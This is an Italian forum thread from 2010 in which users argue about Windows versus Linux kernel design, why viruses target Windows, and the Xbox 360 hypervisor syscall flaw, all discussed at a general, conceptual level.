22-01-2010, 09:24
Intanto hai confuso un OS col suo kernel... poi hai detto che XP è monolitico (il suo kernel non lo è, chiedi a Digital Research... lo è il resto a causa dell'uso spregiudicato dei lock).

Ma no, non ho confuso Kernel con SO.
Anche Blocco Note fa parte di Window, ma spero che tutti qui dentro non pensino che il codice di blocco note sia integrato in quello che viene chiamato Sistema operativo.
Esempio all'estremo, ma anche tante altre parti di Windows si puo' tranquillamente pensare che non facciano parte del sistema operativo, e che siano quindi mantenute comunque a parte, indipendentemente dalla natura del Kernel.

E poi ho detto proprio il contrario. Linux e' monolitico, mentre Windows lo e' di meno, sebbene non sia completamente modulare.

Quello che volevo dire a Trallallero, e' che tra Windows e Linux, quello piu' Monolitico dei 2 e' proprio Linux.

ConteZero
22-01-2010, 09:30
Beh, un OS non è solo il suo ring0, anche le librerie di sistema necessarie per esportare le funzioni disponibili in userspace fanno parte dell'OS propriamente detto.
MacOSX ha un fichissimo kernel modulare, ma è tutto wrappato in un infrastruttura FreeBSD, col risultato che il kernel è modulare ma per arrivarci devi comunque passare da un sistema di librerie che limitano di molto la modularità intrinseca del kernel... riducendone i vantaggi.

Per intanto l'unico OS completamente modulare è QNX (della Harman International... in pratica con le mie JBL supporto QNX), ed è un OS che vola.

trallallero
22-01-2010, 09:52
Quello che volevo dire a Trallallero, e' che tra Windows e Linux, quello piu' Monolitico dei 2 e' proprio Linux.
Ok, ho sbagliato termine (non sono un teorico), ma era per dire che Windows, essendo prodotto da una sola società, è blocco unico tra kernel, librerie e servizi e quindi molto più attaccabile da un virus che può dare per scontate molte più cose che su Linux.

gugoXX
22-01-2010, 10:42
Ok, ho sbagliato termine (non sono un teorico), ma era per dire che Windows, essendo prodotto da una sola società, è blocco unico tra kernel, librerie e servizi e quindi molto più attaccabile da un virus che può dare per scontate molte più cose che su Linux.

Fa finta di essere un potenziale scrittore di virus, in grado di scrivere virus sia sotto Windows che sotto Linux.
Quale sistema preferisci approcciare, uno del quale hai il codice o uno del quale non ce l'hai?
A rigor di logica, se il ragionamento fosse "singola societa'" vs open-source la quantita' di virus circolante sotto Windows dovrebbe essere analoga a quella circolante sotto Mac.
E invece non e' cosi'.
La quantita' di virus e' proporzionale alla diffusione del sistema operativo. Se Linux divenisse il sistema piu' diffuso, allora i crack per giochi che girano in rete, oppure i programmini come le renne di babbo natale, sarebbero scritti per funzionare sotto Linux.
E poiche' gli utenti sarebbero sempre gli stessi qualcuno che ci clicca sopra lo si trova sempre. Con conseguenze immaginabili.

C'e' anche l'effetto "fama" da considerare, soprattutto davanti a quei virus il cui payload non fa nulla di male, scritti appunto per salire alla cronaca come il Neo del momento.
Nella community degli scrittori di virus, se scrivi un virus per Windows sali agli onori e sei deificato. Se scrivi un virus per Linux ti tirano le pietre.

ConteZero
22-01-2010, 10:49
Non cambia nulla.
I "buchi" non sono falle evidenti del software (altrimenti i programmatori le avrebbero già trovate), sono glitch del codice compilato... quindi del sorgente te ne fai relativamente poco (a meno di non dover CHIUDERE quella falla).

gugoXX
22-01-2010, 10:55
Non cambia nulla.
I "buchi" non sono falle evidenti del software (altrimenti i programmatori le avrebbero già trovate), sono glitch del codice compilato... quindi del sorgente te ne fai relativamente poco (a meno di non dover CHIUDERE quella falla).

Ma non e' mica vero. Il buffer overflow nelle librerie e' un esempio che mi viene in mente di programma del sistema operativo scritto male.
Il fatto che il programma non controlli in anticipo la lunghezza dei dati in arrivo posso tranquillamente leggerlo nel sorgente.

ConteZero
22-01-2010, 10:59
Ma non e' mica vero. Il buffer overflow nelle librerie e' un esempio che mi viene in mente di programma del sistema operativo scritto male.
Il fatto che il programma non controlli in anticipo la lunghezza dei dati in arrivo posso tranquillamente leggerlo nel sorgente.

Ma tu hai idea di quanto dovresti leggere per trovare "a mano" un buffer overflow ? :asd:

gugoXX
22-01-2010, 11:02
Ma tu hai idea di quanto dovresti leggere per trovare "a mano" un buffer overflow ? :asd:

E pensa se non potessi nemmeno leggere :asd:

k4ez4r
22-01-2010, 11:13
Ottimo l'effetto ottenuto :D

People in Germany Are Switching Browsers

http://blog.mozilla.com/metrics/files/2010/01/Impact_from_Germany_v2.png

Fonte: Blog di Mozilla (http://blog.mozilla.com/metrics/2010/01/19/people-in-germany-are-switching-browsers/)

trallallero
22-01-2010, 12:01
Fa finta di essere un potenziale scrittore di virus, in grado di scrivere virus sia sotto Windows che sotto Linux.
Quale sistema preferisci approcciare, uno del quale hai il codice o uno del quale non ce l'hai?
A rigor di logica, se il ragionamento fosse "singola societa'" vs open-source la quantita' di virus circolante sotto Windows dovrebbe essere analoga a quella circolante sotto Mac.
E invece non e' cosi'.
La quantita' di virus e' proporzionale alla diffusione del sistema operativo. Se Linux divenisse il sistema piu' diffuso, allora i crack per giochi che girano in rete, oppure i programmini come le renne di babbo natale, sarebbero scritti per funzionare sotto Linux.
E poiche' gli utenti sarebbero sempre gli stessi qualcuno che ci clicca sopra lo si trova sempre. Con conseguenze immaginabili.

Son d'accordo, come già avevo scritto, sulla parte in grassetto, ma sul open o non open source no, non penso che incida molto sulla qualità e/o quantità dei virus e neanche sulla scelta degli scrittori di virus.
Non intendevo "singola societa'" vs open-source ma "singola societa'" vs "sistema con diverse possibilità di scelta". È molto più difficile indovinare com'è configurato un sistema Linux che uno Windows perchè quello Windows esce "pronto" dalla fabbrica con parecchie features fisse e non modificabili e il virus potrebbe appoggiarsi proprio su queste. Su Linux non sai neanche che interfaccia audio si sta usando :D


C'e' anche l'effetto "fama" da considerare, soprattutto davanti a quei virus il cui payload non fa nulla di male, scritti appunto per salire alla cronaca come il Neo del momento.
Nella community degli scrittori di virus, se scrivi un virus per Windows sali agli onori e sei deificato. Se scrivi un virus per Linux ti tirano le pietre.
Ecco, a questo non c'avevo pensato ma mi sembra un'acuta osservazione.
Scrivere un virus per 4 nerd sfigati è da bastardi :asd:

cdimauro
22-01-2010, 13:20
Guarda il ragionamento del "più utilizzato" può anche filare...
Ma nessuno che raccoglie la sfida? Nessuno che pensa: <Linux inviolabile? ora ci penso io e incasino tutte le distro del pianeta>

O devo pensare che tutti quelli che scrivono virus lo fanno per commessa (cioè li viene commissionato)?

Alla fine non occorrerebbe che il virus infetti molte macchine... basterebbe la sua esistenza(del virus) e la capacità di infettare nuovi sistemi in modo efficace, per distruggere il mito di "linux no virus"
Dai un'occhiata a questo (http://pinerolo.linux.it/slip/Virus_per_Linux,_utopia_o_solo_questione_di_tempo).
:wtf:
Allora non capisco la tua uscita su di me prima: potresti essere più chiaro?
Se sia cambiata la filosofia di MS non lo so, ma è risaputo che Windows fino ad XP è un unico monolite infatti, guarda caso, se crasha un programma può succedere che ti crashi tutto il sistema con un bel blue screen.
Questo non capita dai tempi di NT. E se escludiamo le zone di memoria condivise col DOS che si teneva in memoria, nemmeno con Windows 3.0 e 9x.
Si lo so, tu con Fedora hai avuto un kernel panic per delle semplici malloc C, ma detto da uno che in firma eslcude qualsiasi linguaggio che non sia il Python per imparare a programmare, vale poco come testimonianza.
Avvelenamento del pozzo (http://www.linux.it/~della/fallacies/avvelenamento-del-pozzo.html).

Poi in sezione Programmazione possiamo parlare quanto vuoi di quale linguaggio possa essere migliore per imparare a programmare.
In dieci anni di Linux-Windows non ho MAI avuto un kernel panic ma tanti blue screens :boh:
E questo vuol dire soltanto che trallallero in 10 anni non ha avuto KP. Null'altro.
Vedi perchè preferisco non discutere con te, ti giri sempre il dicorso a tuo vantaggio facendo credere di non aver capito un cazzo (ma comincio ad avere qualche dubbio).
Ci riprovo:

L'utente Windows di solito, parlo proprio della massa non di chi ci lavora col PC, non sa manco che si può aprire una finestra cmd con la quale eseguire qualche comando più low level di quello che potresti fare tramite il menu avvio o aprendo una finestra browser.
L'utente medio di Windows se ha problemi con una dll (che non sa manco cos'è) od un servizio (idem) porta il PC in assistenza o s'attacca.
L'utente medio Linux è abituato ad avere a che fare con shell quindi non si va a spulciare il codice del kernel come dici tu tanto per buttarla in caciara, ma è più a contato con esso, come ho scritto, essendo abituato ad eseguire comandi da tastiera per il controllo del sistema.
È vero che ormai con Ubuntu ed altri sistemi Linux non serve quasi più la shell, ma non conosco un utente Linux che non sia capace di gestire il proprio sistema in maniera indipendente via comandi manuali.
Quindi l'esistenza dei sorgenti o meno non è in discussione. Lo sono soltanto le skill individuali, e su questo non ho nulla da dire.
Con la notevole differenza che se hai Windows hai sicuramente stoppardi.dll di Microsoft che può essere in versione "pre X" o "post X" (dove X è la data dell'exploit), se hai Linux puoi avere libstoppardi.a o libnonstoppardi.a o ancora niente, in 150 possibili versioni (a seconda della build).
Stoppardi.dll esisterà in tutte le installazioni di windows, e sarà diffuso solo nelle tre o quattro build che Microsoft ha rilasciato (il che vuol dire che se c'è una vulnerabilità è facile localizzarla e fare il "fine tuning" su quella specifica dll) mentre su Linux le cose si fanno decisamente più complicate.
Benissimo, ma alla fine si tratta di verificare ciò che ciò ed eseguire apposito codice. Che non mi pare poi tutta questa complicazione, specialmente per chi ha sviluppato skill adeguate (e chi scrive virus e trojan non sono gli ultimi arrivati).
Microsoft dice che Windows è un sistema operativo "arricchito", di esso fa parte anche tutto un set di librerie, funzioni ed add on vari che, di fatto, compongono il "sistema" pur essendo solo "contorno".
Linux è solo il kernel, GNU è il set minimo a disposizione... GNU/Linux è un linux per come lo si intende colloquialmente, ma questo non vuol dire che non esista (ad esempio) GNU/Hurd (MACH/FIASCO) o GNU/FreeBSD.
Se mi parli di "funzionalità minimali" devi specificarmi di COSA stiamo parlando nel dettaglio... mica siamo in Windows, dove tutto, dall'EXECUTIVE alle librerie per i font è "sistema".
In una distro non hai solo il kernel, per cui questa differenziazione con Windows lascia il tempo che trova, perché per essere usabile hai bisogno di QUALCOSINA di più del kernel.

Tutto ciò che serve per far partire un s.o., rientra nel discorso dei componenti "minimali" di cui parlavo prima.
Al di là dei nuovi layer di sicurezza (ASLR & co) aggiunti tanto su linux quanto su windows il punto è che su linux c'è molta meno unità di quanta non ve ne sia su windows.
Una distribuzione mainstream diffusissima come Ubuntu può annoverare tranquillamente venti o trenta diverse "build" per la stessa libreria (ed il "rampino" d'ingresso non puoi compilarlo sulla macchina bersaglio, dev'essere pronto PRIMA).
Questo non è affatto detto. Dipende dalle falle. Inoltre, ad esempio, se ne trovo una nuova... al 99,999% è disponibile per qualunque versione di Linux.
Peraltro trovare le falle è abbastanza facile (o meglio, trovare i REPORT in cui sono nominate),
A parte questo, le falle (nuove) le può trovare anche un malintenzionato.
sfruttarle è decisamente più complicato (e non "un po'", parliamo di diversi ordini di grandezza).
Se la libreria ha un "buco" questo può voler dire dover adattare il "codice d'ingresso" a ventri o trenta diverse "versioni"... e stiamo parlando di una sola distribuzione, in giro di distribuzioni ce ne sono diverse.
A questo aggiungi che su windows la piattaforma è bene o male "stabile" mentre su linux varia in base alle preferenze dell'utente ed arrivi alla situazione per cui su linux non puoi essere sicuro di poter agire anche dopo l'ingresso (perchè ti manca la libreria necessaria per il privilege excalation, perché non c'è il compilatore "compatibile", perché non c'è il perl e così via) ed hai come risultato che per fare un virus che funzioni sotto linux devi progettare leviatano che consideri una quantità enorme di variabili... mentre su windows lo sviluppo è semplicissimo.
Non lo metto in dubbio, ma come dicevo prima, non mi sembra siano problemi insormontabili / non gestibili da una persona esperta.
Si chiamano sistemi operativi monolitici, che e' la modalita' di progettazione anche di Linux, come idea di Torvalds, contrastando le idee di Dijkstra.
Era Andrew Tanenbaum.
Comunque quanto dici non e' vero. L'unico modo per avere un blue screen sotto Windows comunque e' quello di avere un baco in posizioni ben precise (non un qualsiasi baco) in un processo che gira a livello 0, ovvero parti di sistema operativo stesso o driver scritti da terze parti.
Con un crash di un semplice programma a ring 4 (come quelli che vengono eseguiti quando l'utente clicca sulle icone) non lo vedo possibile, a meno che non faccia uso di "problemi" o "bachi" di cui presenti appunto su parti di SO o Driver di terze parti (che neppure sarebbero colpa di Microsoft)
A parte il ring 4 (che in realta è il 3), concordo.
Intanto hai confuso un OS col suo kernel... poi hai detto che XP è monolitico (il suo kernel non lo è, chiedi a Digital Research... lo è il resto a causa dell'uso spregiudicato dei lock).
Hum. Avresti qualche informazione su questo uso dei lock?
Non cambia nulla.
I "buchi" non sono falle evidenti del software (altrimenti i programmatori le avrebbero già trovate), sono glitch del codice compilato... quindi del sorgente te ne fai relativamente poco (a meno di non dover CHIUDERE quella falla).
Io penso proprio di sì, invece.
Ma tu hai idea di quanto dovresti leggere per trovare "a mano" un buffer overflow ? :asd:
Ma tu hai idea del lavoro che fanno i cacciatori di bug con Windows? Analizzare il disassemblato della API interne di Windows non è esattamente la stessa cosa di spulciarsi i sorgenti originali, magari con tanto di commenti. :D

gugoXX
22-01-2010, 13:23
Era Andrew Tanenbaum.

A parte il ring 4 (che in realta è il 3), concordo.


Hai ragione, era Tanenbaum, non Dijkstra. La memoria.
E anche sul ring. E' il quarto ring, ovvero il numero 3. Ma e' lo stesso errore dei cristiani, sono in buona compagnia :asd:

ConteZero
22-01-2010, 13:41
Benissimo, ma alla fine si tratta di verificare ciò che ciò ed eseguire apposito codice. Che non mi pare poi tutta questa complicazione, specialmente per chi ha sviluppato skill adeguate (e chi scrive virus e trojan non sono gli ultimi arrivati).

Il punto è che l'universo windows è assimilabile ad un pianeta dove vivono milioni di persone aventi solo una decina di cariotipi (ie, milioni di copie di dieci persone)... fare un virus che sfrutta una fragilità genetica è facilissimo.
Il pianeta linux, oltre ad essere molto meno popolato, è anche molto più "vario", per cui fare un virus che possa fare le stesse "vittime" è praticamente impossibile.

In una distro non hai solo il kernel, per cui questa differenziazione con Windows lascia il tempo che trova, perché per essere usabile hai bisogno di QUALCOSINA di più del kernel.

Tutto ciò che serve per far partire un s.o., rientra nel discorso dei componenti "minimali" di cui parlavo prima.

Il "minimale" per linux è assimilabile al minimo assoluto, proprio perché si può "mettere a dieta" una distribuzione linux fino a farla entrare su un floppy... il minimale di windows non esiste, perché windows è solo quei cinque flavor per quelle tre versioni in commercio.
Indovina quale delle due come "minimo assoluto" è meno attaccabile ?
Quello che non si trascina dietro tonnellate di roba.

Questo non è affatto detto. Dipende dalle falle. Inoltre, ad esempio, se ne trovo una nuova... al 99,999% è disponibile per qualunque versione di Linux.

Si, ma a seconda della libreria, della versione, dell'os e dei layer sottostanti il codice d'exploit può variare in modo anche abbastanza radicale.
Il che può voler dire "tutte le macchine fino ad oggi possono essere bucate" -a patto di scrivere un inject personalizzato per ogni tupla "servizio/liberia/libreria/.../libreria/versione kernel/piattaforma".

Hum. Avresti qualche informazione su questo uso dei lock?

Dovrei cercare e non c'ho voglia :D

Ma tu hai idea del lavoro che fanno i cacciatori di bug con Windows? Analizzare il disassemblato della API interne di Windows non è esattamente la stessa cosa di spulciarsi i sorgenti originali, magari con tanto di commenti. :D

E, nonostante questo, buona parte dei bug viene da compilazioni/ottimizzazioni che lasciano aperte delle falle involontarie.
Senza andare lontani la falla con la quale hanno aperto la 360 è un errore di compilazione che produce un codice che azzera solo i primi 32 bit di un registro.

cdimauro
22-01-2010, 19:37
Il punto è che l'universo windows è assimilabile ad un pianeta dove vivono milioni di persone aventi solo una decina di cariotipi (ie, milioni di copie di dieci persone)... fare un virus che sfrutta una fragilità genetica è facilissimo.
Il pianeta linux, oltre ad essere molto meno popolato, è anche molto più "vario", per cui fare un virus che possa fare le stesse "vittime" è praticamente impossibile.
Difficile sì, ma impossibile proprio no. D'altra parte se ci sono stati (e ci saranno) siti con Linux che vengono violati sfruttando delle falle, lo stesso approccio può essere sfruttato dai virus.
Il "minimale" per linux è assimilabile al minimo assoluto, proprio perché si può "mettere a dieta" una distribuzione linux fino a farla entrare su un floppy... il minimale di windows non esiste, perché windows è solo quei cinque flavor per quelle tre versioni in commercio.
Indovina quale delle due come "minimo assoluto" è meno attaccabile ?
Quello che non si trascina dietro tonnellate di roba.
Questo lo so, ma è anche vero che di Linux hai i sorgenti, e puoi spulciarteli a caccia di falle non trovate. Di Windows no, e andare a caccia di falle disassemblando codice richiede skill molto più elevate.

Penso sia molto più semplice scrivere dei tool di generazione automatica di codice che tiene in considerazione delle falle a seconda delle versioni del software.
Si, ma a seconda della libreria, della versione, dell'os e dei layer sottostanti il codice d'exploit può variare in modo anche abbastanza radicale.
Il che può voler dire "tutte le macchine fino ad oggi possono essere bucate" -a patto di scrivere un inject personalizzato per ogni tupla "servizio/liberia/libreria/.../libreria/versione kernel/piattaforma".
Cosa che, come dicevo, si può anche automatizzare. Inoltre non hai bisogno di scrivere n-mila versioni degli exploit, ma puoi anche realizzare un sistema che vada a caccia di queste informazioni, ove possibile, e le sfrutti, diminuendo di gran lunga il numero di possibilità.

Inoltre, come dicevo prima, se scopri una falla nel kernel, hai buone possibilità di sfruttarla a tuo piacimento.
Dovrei cercare e non c'ho voglia :D
OK :)
E, nonostante questo, buona parte dei bug viene da compilazioni/ottimizzazioni che lasciano aperte delle falle involontarie.
Senza andare lontani la falla con la quale hanno aperto la 360 è un errore di compilazione che produce un codice che azzera solo i primi 32 bit di un registro.
Mumble. Strano. Un errore di questo mi pare difficilmente generabile da un compilatore, specialmente considerando la vasta e lunga esperienza che MS ha nella loro scrittura.

Lo vedo più come un errore umano, da parte di uno sviluppatore che ha scritto un pezzo di codice che gira nella 360.

Hai per caso qualche link sull'argomento? Così ci butto un occhio, che l'argomento m'interessa molto. :fagiano:

trallallero
22-01-2010, 19:59
Hum. Avresti qualche informazione su questo uso dei lock?

Dovrei cercare e non c'ho voglia :D
Ne so poco, ma effettivamente XP (uno dei 3 che ho) ha una patch aggiuntiva di nome unlocker che serve soprattutto per i file multimediali.
Se copio per esempio un mp3 da una chiavetta all'HD, poi devo usare dal menu di Windows "Unlocker" altrimenti non riesco a fare l'unmount.
Stessa cosa sull'HD, se voglio cancellare un .avi o .mp3 puntualmente è lockato e lo devo unlockare come detto prima.

ConteZero
22-01-2010, 20:13
Difficile sì, ma impossibile proprio no. D'altra parte se ci sono stati (e ci saranno) siti con Linux che vengono violati sfruttando delle falle, lo stesso approccio può essere sfruttato dai virus.

Si ma con dei rootkit, con gente che interattivamente lancia comandi e simili per sfruttare le falle... siamo anni luce dal fare il programma stile "virus" che "fa da sè".

Questo lo so, ma è anche vero che di Linux hai i sorgenti, e puoi spulciarteli a caccia di falle non trovate. Di Windows no, e andare a caccia di falle disassemblando codice richiede skill molto più elevate.

Nella pratica è inutile guardare i sorgenti per cercare le falle, le falle le cerchi sempre dal disassemblato (e ci sono tool appositi che aiutano a trovare tali falle) perché è facile che ad introdurle sia qualche ottimizzazione del compilatore.
Per i sorgenti... sigh... windows 2000, parlando con quelli di microsoft, l'hanno dato in visione (anni addietro) a sedici università, e solo quattro sono riuscite a ricompilarlo... trattavasi di sedici CD di sorgenti.

Penso sia molto più semplice scrivere dei tool di generazione automatica di codice che tiene in considerazione delle falle a seconda delle versioni del software.

Cosa che, come dicevo, si può anche automatizzare. Inoltre non hai bisogno di scrivere n-mila versioni degli exploit, ma puoi anche realizzare un sistema che vada a caccia di queste informazioni, ove possibile, e le sfrutti, diminuendo di gran lunga il numero di possibilità.

Si, ma un virus dovrebbe comunque armarsi di "rampini multipli" e fare le euristiche per capire "che bestia" stà tentando di arpionare... capirai che come virus comincia a diventare abbastanza grassottello :asd:

Inoltre, come dicevo prima, se scopri una falla nel kernel, hai buone possibilità di sfruttarla a tuo piacimento.

Questo ovunque, c'è però il problema che non tutte le falle sono sfruttabili (mi ricordo una discussione su un tizio che aveva trovato un buffer overflow in un frammento di codice eseguibile solo da root) e che comunque accederci e sfruttarle a dovere non è facile.

OK :)

Per esempio : http://channel9.msdn.com/shows/Going+Deep/Arun-Kishan-Farewell-to-the-Windows-Kernel-Dispatcher-Lock/

Mumble. Strano. Un errore di questo mi pare difficilmente generabile da un compilatore, specialmente considerando la vasta e lunga esperienza che MS ha nella loro scrittura.

E'l'errore tipico che si ha ad usare una variabile con una dimensione diversa dalla lunghezza del registro che deve contenerla.

Lo vedo più come un errore umano, da parte di uno sviluppatore che ha scritto un pezzo di codice che gira nella 360.

Hai per caso qualche link sull'argomento? Così ci butto un occhio, che l'argomento m'interessa molto. :fagiano:

Qui si descrive l'hack : http://free60.git.sourceforge.net/git/gitweb.cgi?p=free60/tools;a=blob_plain;f=imgbuild/hack.txt;hb=HEAD (abbastanza complicato, decisamente affascinante)
Qui si descrive la vulnerabilità : http://www.securityfocus.com/archive/1/461489/30/0/threaded

cdimauro
22-01-2010, 22:06
Ne so poco, ma effettivamente XP (uno dei 3 che ho) ha una patch aggiuntiva di nome unlocker che serve soprattutto per i file multimediali.
Se copio per esempio un mp3 da una chiavetta all'HD, poi devo usare dal menu di Windows "Unlocker" altrimenti non riesco a fare l'unmount.
Stessa cosa sull'HD, se voglio cancellare un .avi o .mp3 puntualmente è lockato e lo devo unlockare come detto prima.
No, quello è un altro tipo di lock (lock su risorsa).

Quello di cui parlavamo è un lock software, utilizzato nel codice per arbitrare l'accesso a una struttura dati in memoria.
Si ma con dei rootkit, con gente che interattivamente lancia comandi e simili per sfruttare le falle... siamo anni luce dal fare il programma stile "virus" che "fa da sè".
I rootkit ci sono per tutte le piattaforme, e sono un'altra cosa rispetto a un virus.
Nella pratica è inutile guardare i sorgenti per cercare le falle, le falle le cerchi sempre dal disassemblato (e ci sono tool appositi che aiutano a trovare tali falle) perché è facile che ad introdurle sia qualche ottimizzazione del compilatore.
Se è così, quale sarebbe il vantaggio di avere sorgenti per trovare più facilmente le falle, come viene sostenuto dai fanatici dell'open source? :fagiano:

Comunque io le falle le trovo più comodamente con un sorgente davanti. :cool:
Tanto i compilatori C/C++ di sicuro di default non fanno controlli sugli indici degli array e sulla validità dei puntatori, che sono le cause prime dei buffer overflow.
Per i sorgenti... sigh... windows 2000, parlando con quelli di microsoft, l'hanno dato in visione (anni addietro) a sedici università, e solo quattro sono riuscite a ricompilarlo... trattavasi di sedici CD di sorgenti.
C'è una parte del kernel (il 3%, se non ricordo male) che non è mai stata rilasciata alle università: ecco perché non ci sono riusciti. :D
Si, ma un virus dovrebbe comunque armarsi di "rampini multipli" e fare le euristiche per capire "che bestia" stà tentando di arpionare... capirai che come virus comincia a diventare abbastanza grassottello :asd:
Bisogna vedere come lo scrivi, e in quale linguaggio. :cool:
Questo ovunque, c'è però il problema che non tutte le falle sono sfruttabili (mi ricordo una discussione su un tizio che aveva trovato un buffer overflow in un frammento di codice eseguibile solo da root) e che comunque accederci e sfruttarle a dovere non è facile.
Dipende da quello che si vuole fare. Per falla sfruttabile intendo una che come minimo permette di eseguire arbitrariamente del codice.

Poi se vogliamo spingerci più in là, ne serve una che consenta una priviledge escalation.

Tutte considerazioni che valgono per qualunque s.o., in ogni caso.
Per esempio : http://channel9.msdn.com/shows/Going+Deep/Arun-Kishan-Farewell-to-the-Windows-Kernel-Dispatcher-Lock/
Qui parla di sistemi con parecchi core (più di 64), che è già un'altra cosa e non proprio a portata di mano.

Infatti: "Prior to Windows 7 (and therefore Windows Server 2008 R2) the Windows kernel dispatcher employed a single lock, the dispatcher lock, which worked well for a relatively small numbers of processors (like 64)."
E'l'errore tipico che si ha ad usare una variabile con una dimensione diversa dalla lunghezza del registro che deve contenerla.

Qui si descrive l'hack : http://free60.git.sourceforge.net/git/gitweb.cgi?p=free60/tools;a=blob_plain;f=imgbuild/hack.txt;hb=HEAD (abbastanza complicato, decisamente affascinante)
Qui si descrive la vulnerabilità : http://www.securityfocus.com/archive/1/461489/30/0/threaded
Grazie per i link. Appena ho un po' di tempo me li spolpo (adesso sto cascando dal sonno, e tra un po' vado a nanna).

cdimauro
23-01-2010, 04:56
Ho letto i link e quanto pare si tratta di un errore nella routine di validazione del codice presente nella SysCall.

Quindi, come immaginavo, un errore umano, che non dipende dal compilatore o dall'uso di variabili a 32 o 64 bit: chi ha scritto quella routine di dispatching ha "semplicemente" :ciapet: sbagliato a utilizzare un'istruzione, utilizzandone una che fa un confronto a 32 bit anziché a 64 bit.

AntonioBO
23-01-2010, 09:19
Come al solito, a parte i discorsi tecnici in cui non c'ho capito una beneamata fava e con ciò non sto mancando di rispetto a chi li ha fatti:beati voi che sapete farli, anche a me sarebbe piaciuto entrare più specificamente negli argomenti, ma ho scelto strade diverse (dicesi percorso giuridico.....), ci si dimentica nella giusta enfasi della disquisizione informatica che parliamo di un sistema operativo come "Finestre..." che è a pagamento e tanto (la versione ultimate retail si aggira intorno ai 300 euro) e dovrebbe sfiorare la perfezione. Ovviamente i S.O. essendo fatti fagli umani, possono essere vitima di dimenticanze, ma se faccio pagare agli utenti un sacco di soldi (ammettendo che qualcuno sia così folle da comprarlo e dubito, salvo le licenze oem dei pc imposte... dall'alto...), non posso propinare un servizio azzoppato e potenzialmente pericoloso con bug anche gravi soprattutto nel navigatore per la rete. Di linux dite pure quello che volete:è difficile, è primitivo, è incomprensibile (?) eccc.... ma è un sistema per cui non si tira fuori un soldo e te lo puoi copiare e distribuire come ti pare. Per cui se ti piace te lo prendi, se no paghi (diciamo così... salvo mulo e torrent...... ehm.....) e ti installi windows che non puoi/potresti copiare distribuire ecc..... Le cose stanno così ed è questa la verità.

cdimauro
23-01-2010, 09:47
La fiera dei luoghi comuni.

Hai detto tu stesso che non hai competenze in materia, e continui a tirare fuori storie di s.o. che dovrebbero "sfiorare la perfezione" solo perché sarebbero a pagamento.

Non hai la minima idea di quel che sta dietro, fra teoria e pratica, alla scrittura del software, e ciononostante continui a parlare.

L'abbiamo capito che ti piace di più Linux perché è "gratis", "libero", e quello che vuoi tu, per quanto poco possano valere discorsi come questi che sono avulsi dal contesto e da una marea di considerazioni. E che Windows lo vedi come la peste perché "costa", è nelle mani del signore del male, ecc. ecc.

Adesso, cortesemente, potresti almeno riflettere sul "contributo" che stai dando alla discussione, e se non sia il caso di smettere di inquinare il thread con affermazioni che lasciano il tempo che trovano?

Grazie

ConteZero
23-01-2010, 10:05
Ho letto i link e quanto pare si tratta di un errore nella routine di validazione del codice presente nella SysCall.

Quindi, come immaginavo, un errore umano, che non dipende dal compilatore o dall'uso di variabili a 32 o 64 bit: chi ha scritto quella routine di dispatching ha "semplicemente" :ciapet: sbagliato a utilizzare un'istruzione, utilizzandone una che fa un confronto a 32 bit anziché a 64 bit.

Perché, tu pensi che il codice di validazione sia stato scritto in assembly ?

cdimauro
23-01-2010, 10:25
Ho visto il codice, e a naso direi di sì, perché mi sembra codice ben ottimizzato.

Poi i compilatori moderni generano dell'ottimo codice, e potrebbe anche essere questo il caso, eh!

Ma a supporto della mia tesi c'è anche un fatto: che lo stesso registro sia usato prima con un confronto a 32 bit, e poi invece con un'operazione a 64 bit.

Se il codice non fosse assembly ma, ad esempio, C vorrebbe dire che il compilatore è strabacatissimo, perché per lo stesso tipo di dato (il contenuto del registro che contiene l'indice dell'API di sistema da chiamare, che sarà identificato da una parametro, variabile, o quant'altro) ha generato prima un'istruzione che vi accede a 32 bit, e poi una che vi accede a 64 bit.

Altra cosa, stiamo parlando del codice che deve gestire una syscall, cioè una la chiamata di sistema (quindi qualcosa che fa passare la modalità d'esecuzione dallo user mode in cui gira normalmente l'applicazione, al supervisor mode in cui gira normalmente un kernel), e sempre "a naso" :D direi che l'handler per la sua gestione sia scritto proprio in assembly (poi internamente può richiamare codice C, C++, o quant'altro, sia chiaro).

Il tutto molto IMHO e potrei anche sbagliarmi, ma diciamo che sono estremamente convinto della mia ipotesi. ;)

ConteZero
23-01-2010, 10:30
Ho visto il codice, e a naso direi di sì, perché mi sembra codice ben ottimizzato.

Poi i compilatori moderni generano dell'ottimo codice, e potrebbe anche essere questo il caso, eh!

Ma a supporto della mia tesi c'è anche un fatto: che lo stesso registro sia usato prima con un confronto a 32 bit, e poi invece con un'operazione a 64 bit.

Se il codice non fosse assembly ma, ad esempio, C vorrebbe dire che il compilatore è strabacatissimo, perché per lo stesso tipo di dato (il contenuto del registro che contiene l'indice dell'API di sistema da chiamare, che sarà identificato da una parametro, variabile, o quant'altro) ha generato prima un'istruzione che vi accede a 32 bit, e poi una che vi accede a 64 bit.

Altra cosa, stiamo parlando del codice che deve gestire una syscall, cioè una la chiamata di sistema (quindi qualcosa che fa passare la modalità d'esecuzione dallo user mode in cui gira normalmente l'applicazione, al supervisor mode in cui gira normalmente un kernel), e sempre "a naso" :D direi che l'handler per la sua gestione sia scritto proprio in assembly (poi internamente può richiamare codice C, C++, o quant'altro, sia chiaro).

Il tutto molto IMHO e potrei anche sbagliarmi, ma diciamo che sono estremamente convinto della mia ipotesi. ;)

Computa il fatto che Microsoft non ha grandi menti esperte di assembly PPC, non c'ha mai lavorato precedentemente.
E'facile che abbia semplicemente usato una versione "ottimizzata" di un compilatore "standard" passatole da IBM insieme ai progetti di Xenon.
Per il resto trovo difficile che si compia un errore del genere "a mano", è troppo palese.

cdimauro
23-01-2010, 10:55
Al contrario, è facile che possa accadere proprio perché ce l'errore umano (ne so qualcosa io, visto che per anni ho programmato quasi esclusivamente in linguaggio macchina e assembly).

Comunque alla MS hanno esperienza con diverse architetture. Non credo che manchino ingegneri che conoscano quella PPC.

Poi come errore dovuto al compilatore lo trovo estremamente improbabile.

ConteZero
23-01-2010, 11:07
Al contrario, è facile che possa accadere proprio perché ce l'errore umano (ne so qualcosa io, visto che per anni ho programmato quasi esclusivamente in linguaggio macchina e assembly).

Tu non sei Microsoft... quello che segue la progettazione dell'XBox 360 (specie sul versante sicurezza) è stato attentamente esaminato da ben più che un gruppo d'analisti di codice.

Comunque alla MS hanno esperienza con diverse architetture. Non credo che manchino ingegneri che conoscano quella PPC.

Per Microsoft PPC è un architettura nuova.

Poi come errore dovuto al compilatore lo trovo estremamente improbabile.

Basta che il compilatore, non abbastanza sveglio, riceva dal sorgente un dato a 32 bit.
